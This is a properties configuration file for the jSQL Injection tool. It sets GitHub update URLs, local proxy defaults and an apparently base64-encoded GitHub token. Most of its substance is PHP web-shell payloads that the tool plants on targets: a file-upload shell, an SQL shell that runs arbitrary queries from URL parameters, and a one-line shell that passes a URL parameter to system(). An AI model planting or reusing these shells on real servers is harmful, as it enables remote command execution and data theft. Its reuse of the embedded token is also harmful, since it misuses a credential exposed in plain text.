jsql.version = 0.83

github.webservice.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/jsql-injection.json

github.webservice.i18n.root = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/jsql.properties
github.webservice.i18n.locale = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/

github.issues.url = https://api.github.com/repos/ron190/jsql-injection/issues

github.url = https://github.com/ron190/jsql-injection

github.token = Nzg2YjM0NDQzZTc2OWQ4ZDJiYTc0YzI1MThmYWRmNmRhNDE2Zjc0NA==

shell.upload = <?php echo move_uploaded_file($_FILES['u']['tmp_name'], getcwd().'/'.basename($_FILES['u']['name']))?'${shell.lead}y':'n'; ?>

shell.sql = \
<${shell.lead}><?php mysql_connect('localhost',$_GET['u'],$_GET['p']);\
$result=mysql_query($r=$_GET['q'])or die('<SQLe>Query failed: '.mysql_error().'<${shell.trail}>');\
if(is_resource($result)){\
echo'<SQLr>';\
while($row=mysql_fetch_array($result,MYSQL_NUM))echo'<tr><td>',join('</td><td>',$row),'</td></tr>';\
}else if($result==TRUE)echo'<SQLm>Query OK: ',mysql_affected_rows(),' row(s) affected';\
else if($result==FALSE)echo'<SQLm>Query failed';\
?><${shell.trail}>

shell.web = <${shell.lead}><?php system($_GET['c']); ?><${shell.trail}>

http.proxy.default.ip = 127.0.0.1
http.proxy.default.port = 8118
https.proxy.default.ip = 127.0.0.1
https.proxy.default.port = 8118

shell.system = 